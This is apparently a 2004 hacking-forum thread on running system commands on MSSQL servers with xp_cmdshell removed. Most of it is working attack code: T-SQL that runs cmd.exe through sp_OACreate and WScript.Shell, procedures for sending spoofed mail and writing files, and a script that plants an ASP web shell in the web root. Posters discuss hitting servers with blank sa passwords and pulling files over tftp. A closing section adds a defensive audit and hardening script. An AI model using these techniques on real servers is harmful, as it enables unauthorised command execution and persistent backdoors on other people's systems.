Hi, I lately figured out a method to execute commands on "secured" (xp_cmdshell deleted) MSSQL servers ... the simple trick to bypass xp_cmdshell:
CODE
-- create a WScript.Shell COM object through the OLE automation procedures
-- (the posted ProgID "wscripts.shell" was a typo; single quotes work regardless of QUOTED_IDENTIFIER)
declare @s int
exec sp_oacreate 'wscript.shell', @s out
-- call its Run method; the return value is discarded (NULL)
exec sp_oamethod @s, 'run', NULL, 'cmd.exe /c echo whatever>temp.txt'
Just wanted everybody t0 Kn0w =9 and again still searching ... =)
GhostCow
Feb 3 2004, 06:38 AM
Cool, I'll test it! Umm, can you explain a little more about it?
Devil
Feb 3 2004, 09:31 AM
Yeah.... please explain this a little bit! But if I got this right... then you use these commands on your stro and the next person trying to hack this is gonna get an SQL error?? Am I right?
thx
jockel
Feb 3 2004, 10:28 AM
No, sorry =) This is a method of tricking so-called "secured" MSSQL servers and getting cmd.exe even if xp_cmdshell is disabled or deleted..
kenshin_efx
Feb 3 2004, 07:14 PM
Let me see, if I have a SQL scan with account sa and pass blank for example, and I try to make a dir c:\ and it tells me SQL ERROR, is it because xp_cmdshell was deleted or disabled, and if I write the commands that you posted here, I can execute echo for example.... or not??
I try to learn English but I'm not good enough... xDD
the
Feb 3 2004, 08:51 PM
Nice, dude, thx
Copkill
Feb 3 2004, 09:30 PM
Thx for this, I will test it
mofo
Feb 4 2004, 05:00 AM
It won't work, once cmd shell is deleted, no SQL queries. I know SQL, been rooting for over 2 years.
The cmd is sp_dropextendedproc xp_cmdshell to secure.
labbertasche
Feb 4 2004, 02:44 PM
Big thx, very interesting, let's google to learn more about "sp_oamethod" ....
Greets, labbertasche
Antil
Feb 4 2004, 02:59 PM
Woeii, thanx for this info man!
jockel
Feb 4 2004, 03:31 PM
QUOTE (mofo @ Feb 4 2004, 05:00 AM)
It won't work, once cmd shell is deleted, no SQL queries. I know SQL, been rooting for over 2 years.
The cmd is sp_dropextendedproc xp_cmdshell to secure.
?? What won't work ??
FOR SURE it works =) Have done it thousands of times ... and how do you manage to delete cmd !??
HAnzsz
Feb 4 2004, 03:42 PM
Mate, this is good info,
but I am getting this message from the server:
CODE
The command(s) completed successfully.
Now I wanna check what I have echoed... I wanna "read" what I just echoed.
How do I do that.. is it possible?
jockel
Feb 4 2004, 04:21 PM
First: cmd.exe /c echo whatever>temp.txt
Second: cmd.exe /c type temp.txt
What else =) ?
The-X
Feb 4 2004, 04:23 PM
I did not try it, but I think you can use all DOS commands...
For viewing just put the command "type *your-file*" instead of the echo command...
Thom
Feb 4 2004, 07:38 PM
What if it's admin/123 as user/pass?.. Didn't get it working for me.
jockel
Feb 4 2004, 07:39 PM
It's the same. What tools do you use to connect....?
Fantafour
Feb 4 2004, 08:58 PM
I have tested it with "SQL Execute helper tool 2.0".
What kind of tool did you use?
labbertasche
Feb 4 2004, 09:14 PM
osql.exe / isql.exe
Double-=V=-
Feb 4 2004, 09:44 PM
Can somebody post or PM me a tool which can do this? I didn't understand how to get this working with osql.exe.
Cheers,
flashb4ck
Feb 4 2004, 09:57 PM
Oh yeah, that's very niCe information, now I'll test it 4 me.
I am using sqlexec, it's a nice tool but works with xp_cmdshell, I think that's the problem.
gr€€tZ fl4Shb4Ck
net_runner
Feb 4 2004, 09:57 PM
It will bypass the SQL ERROR or what...?
jockel
Feb 4 2004, 10:52 PM
Yeah, exactly .... =) Just use osql ... it's really simple =) In the near future I'll release a new improved sqlexec version which supports:
- Mail support =)
- File writing support
- Custom cmdshell
If you have any cool ideas plz post =) Whoever might need it, here are some more useful SQL functions you can use with osql or the new sqlexec version ....
CODE
-- if you want your MSSQL Server to send mails =)
-- (T-SQL comments are "--"; the "//" in the original post is not valid T-SQL)
CREATE PROCEDURE h4x0r$mail(
    @adr varchar(255),
    @msg varchar(2000),
    @sub varchar(255),
    @from varchar(255) = 'bill.gates@microsoft.com')
AS
DECLARE @CDO int, @OLEResult int, @Out int
-- Create CDONTS.NewMail object
EXECUTE @OLEResult = sp_OACreate 'CDONTS.NewMail', @CDO OUT
IF @OLEResult <> 0 PRINT 'CDONTS.NewMail'
-- Call Send method of the object
EXECUTE @OLEResult = sp_OAMethod @CDO, 'Send', NULL, @from, @adr, @sub, @msg, 0
IF @OLEResult <> 0 PRINT 'Send'
GO

-- if you ever want to write to a file ... nearly useless =)
CREATE PROCEDURE h4x0r$writeToFile(@FileName varchar(255), @Text1 varchar(255))
AS
DECLARE @FS int, @OLEResult int, @FileID int
EXECUTE @OLEResult = sp_OACreate 'Scripting.FileSystemObject', @FS OUT
IF @OLEResult <> 0 PRINT 'Scripting.FileSystemObject'
-- Open a file (mode 8 = ForAppending, 1 = create if missing)
EXECUTE @OLEResult = sp_OAMethod @FS, 'OpenTextFile', @FileID OUT, @FileName, 8, 1
IF @OLEResult <> 0 PRINT 'OpenTextFile'
-- the post ends here: as posted, the procedure opens the file but never writes @Text1 to it
GO
If you're gonna try and tftp, make sure that they have tftp.exe, lol; if it doesn't, try ftp.exe, but if the admin secured his xp_cmdshell, ftp.exe and tftp.exe might also be gone.
Axl
Feb 6 2004, 02:36 AM
Actually I was using ftp and all I get is 1> 2> 3> 4> 5> 6> 7> 8> 9>
BigBen
Feb 6 2004, 03:14 AM
QUOTE
Actually I was using ftp and all I get is 1> 2> 3> 4> 5> 6> 7> 8> 9>
Me too, doesn't work, or am I doing something wrong?
greetz
BigBen
jockel
Feb 6 2004, 06:21 PM
You don't get the results displayed with my script .. it just executes them directly because of the "run" parameter .. Try being creative ... you can spawn your shell in a thousand ways ..
Do I really have to explain EVERYTHING step by step !??
I think you can do this on your own .... don't give up.
PS: one way (as I said, of thousands !! think of your own ! be creative) is for example writing an asp file with cmd =)
e.g.:
CODE
-- scripting.filesystemobject example - create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo1.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd") ) %>'
And please remember I post just examples !!! And before posting stuff like "eh not working buddy." plz be so kind to find out HOW =)
Sry to go off topic, but does anyone have isql.exe? I can't seem to find it alone on the forum or with Google. Thanks in advance
Axl
Feb 7 2004, 01:30 AM
QUOTE (jockel @ Feb 6 2004, 06:21 PM)
You don't get the results displayed with my script .. it just executes them directly because of the "run" parameter .. Try being creative ... you can spawn your shell in a thousand ways ..
Do I really have to explain EVERYTHING step by step !??
I think you can do this on your own .... don't give up.
PS: one way (as I said, of thousands !! think of your own ! be creative) is for example writing an asp file with cmd =)
e.g.:
CODE
-- scripting.filesystemobject example - create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo1.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd") ) %>'
And please remember I post just examples !!! And before posting stuff like "eh not working buddy." plz be so kind to find out HOW =)
Er, you are funny, you just fecking said that those commands one could use to upload to an ftp server. If you are gonna act like you have discovered something monumental, you could at least back it up. I notice not a single person has said that it was successful.
labbertasche
Feb 7 2004, 07:18 AM
np, here is isql.exe (mhhh no upload .... *grumble*) ok ... here is a link
About securing an MSSQL box, I've learned reading your post that you do it by deleting the "procedure" or "method" (I don't know MSSQL) that is used to run cmd.
I've read in some tutorial about people who secure the box by changing the sa password... is this wrong? Cause after this change the sysop may notice it?
Sorry for the stupid question if it is. I'm new here and in the scene (just 1 hacxxx lol).
Thank you
Thom
Feb 9 2004, 02:33 PM
This isn't the "hacxxx" scene. This is the security scene... go to FXPBoards for the "hacxxx" scene...
tyler.durden
Feb 9 2004, 02:43 PM
QUOTE (Thom @ Feb 9 2004, 02:33 PM)
This isn't the "hacxxx" scene. This is the security scene... go to FXPBoards for the "hacxxx" scene...
Sorry... you are right...
I did not mean this... I only ask what the situation is about changing the sa password by the attacker.
jockel
Feb 9 2004, 06:09 PM
I think normally a h4x0r wouldn't do that, that's too obvious .. A good method of securing is to deny "execute" rights for sa .. that throws errors like: [Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.
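For the hardening question raised in this thread (dropping xp_cmdshell alone leaves the sp_OACreate/sp_OAMethod path open), here is an added audit-and-fix script that is not from any poster or tool in the thread. It assumes SQL Server 2005 or later, where the 'Ole Automation Procedures' server option and sys.configurations exist; the SQL Server 2000 boxes discussed above do not have them.

```sql
-- Added example (not from the thread). Assumes SQL Server 2005 or later and a
-- sysadmin connection. On SQL Server 2000 there is no server option for this;
-- the sp_OA* procedures are simply sysadmin-only, so the only fix there is to
-- stop applications from connecting as sa or any other sysadmin member.

-- 1. Audit: an instance with xp_cmdshell removed but this option still at 1 is
--    exactly the "secured" server the first post describes.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 2. Harden: turn off both surface-area options at the server level.
--    sp_OACreate and sp_OAMethod are executable only by sysadmin members, and
--    members of sysadmin bypass permission checks, so a DENY against sa does
--    nothing; the component itself has to be off.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 3. Verify the control: the thread's first step, creating the COM object, must
--    now fail with error 15281 ("SQL Server blocked access to procedure
--    'sys.sp_OACreate' of component 'Ole Automation Procedures' because this
--    component is turned off ..."). No command is run here; only creation is tried.
DECLARE @obj int, @hr int;
BEGIN TRY
    EXEC @hr = sp_OACreate 'WScript.Shell', @obj OUT;
    PRINT 'FINDING: sp_OACreate still works (hresult '
          + CONVERT(varchar(12), @hr) + ')';
    EXEC sp_OADestroy @obj;
END TRY
BEGIN CATCH
    PRINT 'OK: ' + ERROR_MESSAGE();
END CATCH;
```

Step 3 is the part worth keeping in a recurring check: the configuration query in step 1 can be satisfied by a setting that someone later flips back on, while the TRY block proves the path is actually closed.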